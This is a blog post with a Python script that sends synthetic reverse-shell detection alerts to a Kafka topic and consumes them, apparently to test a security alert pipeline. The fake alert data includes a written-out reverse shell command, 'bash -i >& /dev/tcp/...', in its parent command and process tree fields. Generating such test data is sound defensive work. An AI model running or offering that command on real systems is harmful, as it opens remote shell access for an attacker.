Python操作kafka

Reads: 1258 Edit

# -*- coding: utf-8 -*-
"""
@author: Carey
@Created on: 2021/10/13 20:33
"""
import datetime
import json
import random
import time
import uuid
import logging

logging.basicConfig(level=logging.INFO)

from kafka import KafkaProducer, KafkaConsumer, KafkaAdminClient

bootstrap_servers = ['10.33.70.110:9092']
username = ""
password = ""
topic = "waf01"
group_id = "waf001"


def kafka_producer():
    producer = KafkaProducer(
        value_serializer=lambda v: json.dumps(v).encode('utf-8'),
        bootstrap_servers=bootstrap_servers,
        # security_protocol='SASL_PLAINTEXT',
        # sasl_mechanism='PLAIN',
        # sasl_plain_username=username,
        # sasl_plain_password=password,
    )
    producer.metrics()
    return producer


def send_topic_msg(producer, json_data):
    producer.send(topic, json_data)


def kafka_data_random() -> dict:
    src_ip = "10.33.40.64"
    dst_ip = "192.168.0.1"
    port = 30025
    time = int(datetime.datetime.now().timestamp())
    data = {"payload_id": f"{topic} caae11a67280125f97a6f", "payload_index": "detect_bounce_shell", "operation": "insert",
     "payload": {"parent_name": "bash", "agent_id": "61150a9f5d41da6a", "pid": 969993,
                 "parent_cmd": f"bash -c bash -i >& /dev/tcp/{dst_ip}/{port} 0>&1", "remark": None,
                 "type": "反弹shell", "std_io": [{"type": "stdin", "ip": src_ip, "port": port},
                                               {"type": "stdout", "ip": src_ip, "port": port}],
                 "result": "未处理", "internal_ip": dst_ip, "target_port": port, "path": "/usr/bin/bash",
                 "uid": "0", "charge_name": None, "host_location": None, "group_relate_name": "开发测试组",
                 "store_time": time, "parent_pid": 969992, "parent_path": "/usr/bin/bash",
                 "external_ip": src_ip, "group": "root", "severity": "高危", "host_ip": dst_ip,
                 "asset_number": None, "create_time": time, "charge_email": None, "pname": "bash",
                 "com_id": "1a16d9d267c1ac3397c9",
                 "ips": ["fe80::250:56ff:fe81:e855", dst_ip, "fe80::250:56ff:fe81:af60", dst_ip,
                         "fe80::250:56ff:fe81:9ac6", src_ip], "group_id": 3, "host_tag_map": {},
                 "target_ip": "10.233.131.64", "os_type": "linux",
                 "detail": f"主机 {src_ip} 发生反弹Shell,连接目标为{dst_ip}:60001",
                 "source_id": "611caae1cec4b14eea56be7f", "user": "root", "process_tree": [
             {"user_name": "root", "uid": 0, "ppid": 0, "pid": 1, "path": "/usr/lib/systemd/systemd", "name": "systemd",
              "group_name": "root", "file_mode": "100755", "euid_user_name": "root",
              "cmd": "/usr/lib/systemd/systemd --system --deserialize 15"},
             {"user_name": "root", "uid": 0, "ppid": 1, "pid": 1530, "path": "/usr/sbin/sshd", "name": "sshd",
              "group_name": "root", "file_mode": "100755", "euid_user_name": "root", "cmd": "/usr/sbin/sshd -D"},
             {"user_name": "root", "uid": 0, "ppid": 1530, "pid": 969220, "path": "/usr/sbin/sshd", "name": "sshd",
              "group_name": "root", "file_mode": "100755", "euid_user_name": "root", "cmd": "sshd: root@pts/0"},
             {"user_name": "root", "uid": 0, "ppid": 969220, "pid": 969222, "path": "/usr/bin/bash", "name": "bash",
              "group_name": "root", "file_mode": "100755", "euid_user_name": "root", "cmd": "-bash"},
             {"user_name": "root", "uid": 0, "ppid": 969222, "pid": 969991, "path": "/usr/bin/bash", "name": "sh",
              "group_name": "root", "file_mode": "100755", "euid_user_name": "root",
              "cmd": f"sh start.sh {dst_ip} {port}"},
             {"user_name": "root", "uid": 0, "ppid": 969991, "pid": 969992, "path": "/usr/bin/bash", "name": "bash",
              "group_name": "root", "file_mode": "100755", "euid_user_name": "root",
              "cmd": f"bash -c bash -i >& /dev/tcp/{dst_ip}/{port} 0>&1"},
             {"user_name": "root", "uid": 0, "ppid": 969992, "pid": 969993, "path": "/usr/bin/bash", "name": "bash",
              "group_name": "root", "file_mode": "100755", "euid_user_name": "root", "cmd": "bash -i"}],
                 "host_name": "SEVP-APP-15", "node_id": "774c4e47683041686148", "node_name": "189java"}}
    return data


def kafka_consumer():
    consumer = KafkaConsumer(
        client_id="Consumer-secker-01",
        group_id=group_id,
        bootstrap_servers=bootstrap_servers,
        # security_protocol='SASL_PLAINTEXT',
        # sasl_mechanism='PLAIN',
        # sasl_plain_username=username,
        # sasl_plain_password=password,
        # session_timeout_ms=3000,
        session_timeout_ms=10000,
        heartbeat_interval_ms=3000,
        enable_auto_commit=True,
        # consumer_timeout_ms=3000,
        auto_offset_reset='smallest',
        # value_deserializer=lambda m: json.loads(m.decode('ascii'))
    )
    print("###########", consumer.topics())
    consumer.subscribe([topic])
    while True:
        msg_batch = consumer.poll(timeout_ms=1000)
        print(msg_batch)
        for partition_batch in msg_batch.values():
            if not partition_batch:
                continue
            for msg in partition_batch:
                print(f"{msg.topic=}, {msg.partition=}, {msg.offset=}, {msg.value=}")


producer = kafka_producer()
starttime = datetime.datetime.now()

for i in range(0, 30):
    data = kafka_data_random()
    send_topic_msg(producer, data)
    time.sleep(1)
producer.close()

endtime = datetime.datetime.now()
print(f"{endtime - starttime}.seconds")
#---------------
# kafka_consumer()

Comments

Make a comment

www.ultrapower.com ,王硕的博客,专注于研究互联网产品和技术,提供中文精品教程。 本网站与其它任何公司及/或商标无任何形式关联或合作。